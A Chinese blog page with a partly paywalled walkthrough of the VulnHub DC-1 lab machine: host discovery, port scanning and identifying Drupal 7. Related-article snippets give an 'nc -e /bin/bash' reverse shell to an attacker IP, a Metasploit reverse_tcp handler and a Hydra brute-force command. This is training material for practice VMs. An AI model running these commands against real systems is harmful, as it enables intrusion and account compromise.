vulnhub靶机渗透DC-1

最新推荐文章于 2025-10-26 15:28:34 发布
原创 最新推荐文章于 2025-10-26 15:28:34 发布 · 677 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

本文详细介绍了如何通过信息收集、端口扫描、漏洞探测与利用,对名为DC1的靶机进行入侵。首先,使用nmap和arp-scan发现靶机IP,然后针对DrupalCMS的漏洞利用MSF进行攻击,获取shell。接着,通过数据库信息获取进一步权限,利用Python反弹shell并修改Drupal密码。在权限提升阶段,尝试了SSH爆破和寻找SUID命令提权,最终达到root权限,找到所有flag。

靶机入侵——DC1

1、环境搭建

​ 下载地址:http://www.vulnhub.com/entry/dc-1,292/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里使用默认桥接到真实网络模式。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.3.1/24

在这里插入图片描述

192.168.3.27 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.3.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27
    在这里插入图片描述

  • web端进一步信息收集

在这里插入图片描述

通过wappalyzer我们发现网站cms为Drupal,中间件为Apache2.2.22,php版本为5.4.45

3、漏洞探测与利用

已知网站cms为Drupal 7,百度一下是否存在历史漏洞。在Seebug 漏洞平台查了一下发现漏洞还挺多。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。

最低0.47元/天 解锁文章
VulnHub DC-1
weixin_45682839的博客
04-13 539
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2730
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
[ vulnhub靶机 ] 渗透测试综合靶场 DC-1 通关记录
最新发布
hzb66666的博客
10-26 1072
本文详细记录了DC-1靶场渗透测试的完整过程。首先介绍了环境搭建步骤,包括Kali虚拟机和DC-1靶场的安装配置。随后重点描述了渗透过程:使用nmap扫描发现目标开放的22、80、111等端口,识别出运行Drupal 7的Web服务;通过Metasploit框架利用Drupalgeddon2漏洞获取初始shell;进一步通过查找Drupal配置文件获取数据库凭证;最后利用SUID提权技术获取root权限。文章不仅提供了详细的操作命令和截图,还深入分析了各漏洞原理,包括Drupal表单API属性注入、数据库配
DC系列打穿靶机DC-1靶机妈生教程!
m0_53419560的博客
11-19 1300
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
vulnhubDC1靶机
LainWith的博客
08-15 1397
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
精选资源
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
精选资源
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 310
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
精选资源
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
dc-1靶机
qq_63267612的博客
09-28 1459
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
Vulnhub靶机DC1
qq_48904485的博客
02-13 482
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC110.0.2.54)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/
DC-1靶机
weixin_52525624的博客
02-24 392
nmap -sP 192.168.1.0/24 然后找到咱们的靶机 nmap -sV -Pn -n 192.168.1.57 访问该站点并查看robots.txt敏感文件 依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号 寻找drupal 7.X版本漏洞,并进行利用 2:使用MSF搜索相关模块并进行利用 Search drupal Use exploit/unix/webapp/drupal_drup...
vulnhub靶机DC-1
Keepb1ue的博客
09-28 2220
文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.56.110 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明,而DC-1需要寻找的flag总数为
Vulnhub-DC-1
KAKA的博客
06-04 1064
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
渗透测试学习之vulnhub系列靶机——DC1
等风来,不如追风去
06-09 2121
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,使用VMware即可直接运行。Drupal 是一个灵活的,基于 LAMP 技术栈的 CMS,它的模块化设计,允许通过安装和卸载模块的方式 添加和移除功能,同时,允许通过安装和卸载主题改变整个网站的视觉感观。在kali当中使用msf查看一下针对这个cms有哪些具体的模块可以使用使用模块弹出 meterpreter >代表利用成功可以继续进行后渗透3、漏洞利用。
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 2159
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 3404
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
Vulnhub靶机 DC-1
菜浪马废的博客
03-19 371
查找靶机IP 扫描本地,254是Kali,那138就是DC-1 arp-scan -l 对DC-1进行端口扫描 发现开放80端口,进浏览器查看一下 nmap -sV 192.168.0.138 发现CMD是Drupal 漏洞查找 msfconsole 启动msf search drupal 查找drupal漏洞 看到最新的是2019-02-20,但是等级是normal,还是用2018-...
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值